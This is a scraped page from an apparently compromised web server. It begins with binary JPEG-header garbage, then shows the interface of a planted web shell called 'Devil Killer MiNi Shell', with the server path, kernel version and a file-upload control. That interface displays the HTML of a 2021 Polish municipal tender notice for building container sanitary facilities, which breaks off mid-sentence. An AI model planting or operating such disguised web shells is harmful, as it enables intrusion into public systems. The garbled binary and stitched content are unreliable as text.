JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210705/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210705/0010447601-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00104476 z dnia 2021-07-05</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Zagospodarowanie przestrzeni publicznej ośrodka terapeutyczno-harcerskiego poprzez budowę sanitariatów wraz z infrastrukturą towarzyszącą </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Strzelin</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 931934957</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Ząbkowicka 11</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Strzelin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">57-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL518 - Wrocławski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowieniapubliczne@strzelin.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.gmstrzelin.finn.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zagospodarowanie przestrzeni publicznej ośrodka terapeutyczno-harcerskiego poprzez budowę sanitariatów wraz z infrastrukturą towarzyszącą </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-7597ec9f-dd8d-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00104476</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-07-05</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00001815/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.14 Zagospodarowanie przestrzeni publicznej ośrodka terapeutyczno-harcerskiego poprzez budowę sanitariatów wraz z infrastrukturą towarzyszącą</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://gminastrzelin.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://gminastrzelin.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja w postępowaniu o udzielenie zamówienia w tym składanie ofert, wymiana informacji oraz<br/>przekazywanie dokumentów lub oświadczeń między zamawiającym a wykonawcą, z uwzględnieniem<br/>wyjątków określonych w ustawie, odbywa się przy użyciu środków komunikacji elektronicznej. Przez<br/>środki komunikacji elektronicznej rozumie się środki komunikacji<br/>elektronicznej zdefiniowane w ustawie z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną<br/>(Dz. U. z 2019r. poz. 123 i 730). 2. W postępowaniu o udzielenie zamówienia ofertę, oświadczenia, o<br/>którym mowa wart. 125 ust. 1 ustawy Pzp, podmiotowe środki dowodowe, pełnomocnictwa,<br/>zobowiązanie podmiotu udostępniającego zasoby składa się, pod rygorem nieważności, w formie<br/>elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym<br/>bądź kwalifikowalnym podpisem elektronicznym. 3. W przedmiotowym postępowaniu Zamawiający<br/>dopuszcza możliwość przekazywania sobie przez strony postępowania oświadczeń, wniosków,<br/>zawiadomień oraz informacji:elektronicznie na adres e-mail: zamowieniapubliczne@strzelin.pl lub za<br/>pośrednictwem Platformy znajdującej się pod adresem: https://gminastrzelin.ezamawiajacy.pl w<br/>zakładce„Korespondencja”. 4.Ogólne zasady korzystania z Platformy,a) zgłoszenie do postępowania<br/>wymaga zalogowania Wykonawcy do Systemu na subdomenie:<br/>https://gminastrzelin.ezamawiajacy.pl,lubhttps://oneplace.marketplanet.pl. b) Wykonawca po wybraniu<br/>opcji „Przystąp do postępowania”zostanie przekierowany do strony https://oneplace.marketplanet.pl,<br/>gdzie zostanie powiadomiony o możliwości zalogowania lub do założenia bezpłatnego konta.<br/>Wykonawca zakłada konto wykonując kroki procesu rejestracyjnego; podaje adres e-mail, ustanawia<br/>hasło, następnie powtarza hasło,wpisuje kod z obrazka, akceptuje regulamin, klika polecenie<br/>„zarejestruj się”. c) Rejestracja Wykonawcy trwa maksymalnie do 2 dni roboczych. W związku z tym<br/>Zamawiający zaleca Wykonawcom uwzględnienie czasu niezbędnego na rejestrację w procesie<br/>złożenia Oferty w postaci elektronicznej.Wykonawca wraz z potwierdzeniem złożenia wniosku<br/>rejestracyjnego otrzyma informację, o możliwości przyspieszenia procedury założenia konta, wówczas<br/>należy skontaktować się pod numerem telefonu podanym w ww. potwierdzeniu.d) Po założeniu konta<br/>Wykonawca ma możliwość złożenia Oferty w postępowaniu. Komunikacja między Zamawiającym a Wykonawcami, w szczególności zawiadomienia oraz informacje, przekazywane są przy użyciu<br/>środków komunikacji elektronicznej za pośrednictwem Platformy Zakupowej. Za datę przekazania<br/>zaświadczeń oraz informacji przyjmuje się datę ich wysłania za pośrednictwem zakładki<br/>„Korespondencja”.5.Zamawiający określa dopuszczalny format podpisu elektronicznego, jako: 5.1.<br/>dokumenty w formacie „pdf" zaleca się podpisywać formatem PAdES, 5.2. dopuszcza się podpisanie<br/>dokumentów w formacie innym niż „pdf", wtedy będzie wymagany oddzielny plik z podpisem. W<br/>związku z tym Wykonawca będzie zobowiązany załączyć, prócz podpisanego dokumentu, oddzielny<br/>plik z podpisem.6.Zamawiający określa dopuszczalne formaty przesyłanych danych tj. plików o<br/>wielkości do 100 MB w txt, rtf, pdf ,xps, odt, ods, odp, doc, xls, ppt, docx, xlsx, pptx, csv, jpg, jpeg, tif,<br/>tiff, geotiff, png,svg,wav, mp3, avi, mpg, mpeg, mp4, m4a, mpeg4, ogg, ogv, zip, tar, gz, gzip, 7z, html,<br/>xhtml, css, xml,xsd,gml, rng, xsl, xslt, TSL, XMLsig, XAdES, CAdES, ASIC, XMLenc. Równocześnie<br/>Zamawiający rekomenduje na format danych przesyłanych plików: pdf. 7. Pozostałe informacje<br/>zawarte są w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego<br/>przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne<br/>rozporządzenie o ochronie danych) (Dz. Urz. UE L119 z04.05.2016, str. 1), dalej RODO, informuję, że:<br/>- administratorem Pani/Pana danych osobowych jest Urząd Miasta i Gminy w Strzelinie, ul.<br/>Ząbkowicka11, 57-100Strzelin;- Kontakt z administratorem bezpieczeństwa informacji w Urzędzie<br/>Miasta i Gminy w Strzelinie,ul. Ząbkowicka 11, 57-100 Strzelin: e-mail: umig@strzelin.pl lub pisemnie<br/>na adres siedziby administratora danych osobowych;- Pani/Pana dane osobowe przetwarzane będą na<br/>podstawie art. 6ust. 1 lit. c RODO w celu wypełnienia obowiązku prawnego ciążącego na<br/>administratorze,związanym z niniejszym postępowaniem o udzielenie zamówienia publicznego;-<br/>odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 74ustawy z dnia 11 września 2019 r. – Prawo zamówień<br/>publicznych (t.j Dz. U. z 2019 r.poz. 2019 ze zm.), dalej ustawa Pzp; - Pani/Pana dane osobowe będą<br/>przechowywane,zgodnie z art.78 ust. 1ustawy Pzp, przez okres 4 lat od dnia<br/>zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata,<br/>okres przechowywania obejmuje cały czas trwania umowy;a po tym czasie przez okres wymagany<br/>przepisami szczególnymi prawa, w szczególności ze względu na cele archiwalne- zgodnie z JRWA:<br/>dokumentacja zamówień publicznych posiada kategorię archiwalną B5 (okres przechowywania 5<br/>lat)natomiast umowa zawartą w wyniku postępowania w trybie zamówień publicznych posiada<br/>kategorię archiwalną B10 (okres przechowywania10 lat);- obowiązek podania przez Panią/Pana<br/>danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w<br/>przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego;-<br/>w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Posiada Pani/Pan:−na podstawie art.15RODO prawo<br/>dostępu do danych osobowych Pani/Pana dotyczących;−na podstawie art. 16RODO prawo do<br/>sprostowania Pani/Pana danych osobowych ;−na podstawie art. 18 RODO prawo żądania od<br/>administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których<br/>mowa w art. 18 ust. 2 RODO ; −prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych<br/>Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza<br/>przepisy RODO;- nie przysługuje Pani/Panu:−w związku z art. 17 ust. 3lit. b, d lub<br/>e RODO prawo do usunięcia danych osobowych;−prawo do przenoszenia danych osobowych,o którym mowa wart. 20RODO;−na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych<br/>osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust.1 lit. c<br/>RODO. -przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z<br/>RODO przetwarzanie Pani/Panu danych osobowych przez administratora. Organem właściwym dla<br/>przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.20.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zakres przedmiotu zamówienia polega na zagospodarowaniu przestrzeni publicznej ośrodka terapeutyczno-harcerskiego poprzez:<br/>a) budowę budynku sanitariatów – kontenerowego jako obiektu parterowego, niepodpiwniczonego z dachem dwuspadowym o kącie 35° pokrytym blachą na rąbek stojącą w kolorze szarym. Konstrukcja budynku składać się będzie z modułów kontenerowych typowych, do których zamontowana zostanie konstrukcja dachowa. <br/>b)	budowę wewnętrznej linii zasilającej elektroenergetycznej n/n (WLZ) – zasilającej sanitariaty; <br/>c)	wykonanie instalacji zewnętrznej wody zasilającej budynek z istniejącej studni wodomierzowej; <br/>d)	wykonanie przykanalika kanalizacji sanitarnej wraz ze zbiornikiem bezodpływowym na nieczystości płynne o pojemności 10 m3; <br/>e)	obsługa geodezyjna i dokumentacja powykonawcza. <br/>Zestawienie powierzchni: <br/>a)	powierzchnia działki nr 259 AM-1 – 6861,00 m2;<br/>b)	powierzchnia zabudowy budynku sanitariatów – 54,18 m2;<br/>c)	powierzchnia użytkowa budynku sanitariatów – 45,53 m2;<br/>d)	kubatura budynku sanitariatów – 251,12 m3; <br/>e)	długość budynku sanitariatów – 9,03 m;<br/>f)	szerokość budynku sanitariatów – 6,00 m; <br/>g)	wysokość budynku sanitariatów – 5,71 m; <br/>Elementy wyposażenia sanitariatów: <br/>a)	uchwyt na papier toaletowy – 4 szt.;<br/>b)	podajnik ręczników papierowych – 3 szt.;<br/>c)	dozownik mydła – 3 szt.;<br/>d)	lustro 70 x 50 cm – 5 szt. <br/>e)	kosz na śmieci 12l – 5 szt.;<br/>f)	szczotka toaletowa – 4 szt.;<br/>g)	wieszaki na ręczniki – 8 szt. <br/>h)	poręcz uchylna dla niepełnosprawnych 70 cm – 2 szt.;<br/>i)	poręcz stała dla niepełnosprawnych 70 cm – 2 szt.;<br/>j)	umywalka wisząca – 5 szt.;<br/>k)	miska ustępowa wisząca – 4 szt.;<br/>l)	tabliczki informacyjne na drzwiach i ścianach – 8 szt.;<br/>m)	tabliczki informacyjne zewnętrzne – 4 szt. <br/>n)	instrukcje bhp oznaczenie pomieszczeń – 2 szt.<br/>o)	tabliczki gaśnicze i instrukcje – 2 szt.;<br/>p)	gaśnice – 2 szt.<br/>q)	wentylatory – 3 szt. <br/>Zamawiający informuje, że w ramach projektu zamierza zrealizować wyłącznie etap I zadania polegający na budowie budynku sanitariatów – kontenerowego wraz z niezbędną infrastrukturą techniczną z wyłączeniem wykonania utwardzeń z kostki betonowej przy zewnętrznych ścianach budynku sanitariatów. <br/>Projekt budowlany nie jest podstawą do realizacji planowanej inwestycji budynku w technologii modułowej. Wykonawca zobowiązany jest po podpisaniu umowy do opracowania projektu wykonawczego wraz z optymalizacją elementów konstrukcyjnych budynku w oparciu o własny/wybrany system budownictwa modułowego. Musi on uzyskać pozytywną akceptację Zamawiającego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45200000-9 - Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2021-12-17</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty najkorzystniejszej, zamawiający będzie się kierował<br/>następującymi kryteriami: a) Cena oferty (C) - 60 punktów, b) Okres gwarancji i rękojmi (G) - 40<br/>punktów. Łączna wartość punktowa zostanie obliczona poprzez zsumowanie wartości = wartość<br/>punktowa „C” (cena oferty) + wartość punktowa „G” (okres gwarancji i rękojmi).</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia publicznego, mogą ubiegać się wykonawcy, którzy nie podlegają<br/>wykluczeniu na zasadach określonych w rozdziale 15 SWZ oraz spełniają określone przez<br/>Zamawiającego warunki udziału w postępowaniu:<br/>2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące: 2.1. zdolności do występowania w obrocie gospodarczym<br/>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku.<br/>Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia własnego, o którym<br/>mowa w rozdziale 21 SWZ.<br/>2.2. uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile<br/>wynika to z odrębnych przepisów Zamawiający nie stawia szczegółowych wymagań w zakresie<br/>spełniania tego warunku.<br/>Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia własnego, o którym<br/>mowa w rozdziale 21 SWZ. 2.3. sytuacji ekonomicznej lub finansowej Zamawiający nie stawia<br/>szczegółowych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza<br/>spełnienie warunku poprzez złożenie oświadczenia własnego, o którym mowa w rozdziale 21<br/>SWZ. 2.4. zdolności technicznej lub zawodowej 1) o udzielenie zamówienia mogą ubiegać się<br/>wykonawcy, którzy wykażą minimalne poziomy zdolności w zakresie doświadczenia, tj. że: a) w<br/>okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia<br/>działalności jest krótszy – w tym okresie, wykonali należycie jedną robotę budowlaną polegającą na: budowie lub przebudowie budynku kubaturowego wraz z instalacjami zewnętrznymi lub dostawie wraz z montażem budynku modułowego/kontenerowego o wartości co najmniej 30.000,00 zł brutto (słownie: trzydzieści tysięcy złotych).<br/>Wykonawca nie może sumować wartości kilku robót budowlanych o mniejszym zakresie dla<br/>uzyskania wymaganych wartości porównywalnych.<br/>W niniejszej SWZ definicje budowy, przebudowy lub remontu należy rozumieć zgodnie z<br/>definicjami ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz.U. z 2020 r. poz. 1333, 2127,<br/>2320, z 2021 r. poz.11)<br/>2) O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy wykażą minimalne poziomy<br/>zdolności w zakresie dysponowania następującymi osobami zdolnymi do wykonania<br/>zamówienia:<br/>a) Kierownik robót budowlanych - minimalne wymagania:<br/>- kwalifikacje zawodowe: uprawnienia budowlane do kierowania robotami budowlanymi<br/>odpowiadające przedmiotowi zamówienia w specjalności konstrukcyjno-budowlanej w<br/>rozumieniu ustawy z dnia 7 lipca 1994 r.<br/>Prawo budowlane (t.j. Dz.U. z 2020 r. poz. 1333 z późn. zm.) lub odpowiadające im uprawnienia<br/>budowlane, które zostały wydane na podstawie wcześniej<br/>obowiązujących przepisów, Zgodnie z art. 12 a ustawy z dnia 7 lipca 1994 r. Prawo budowlane<br/>samodzielne funkcje techniczne w budownictwie mogą również wykonywać osoby, których<br/>odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach<br/>odrębnych, tj. ustawie z dnia<br/>22.12.2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach<br/>członkowskich Unii Europejskiej (tj. Dz.U. z 2020. poz. 220 ze zm.) oraz ustawie z dnia<br/>15.12.2000 r. o samorządach zawodowych architektów, inżynierów budownictwa (tj. Dz. U. z<br/>2019 poz. 1117). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Do oferty Wykonawca zobowiązany jest dołączyć aktualne na dzień składania<br/>ofert oświadczenia o braku podstaw do wykluczenia z postępowania – zgodnie z załącznikiem nr 3 do<br/>SWZ. 2.Oświadczenia, o którym mowa w pkt 1, potwierdzające brak podstaw do wykluczenia w<br/>postępowaniu na dzień składania ofert, tymczasowo zastępują wymagane przez Zamawiającego<br/>podmiotowe środki 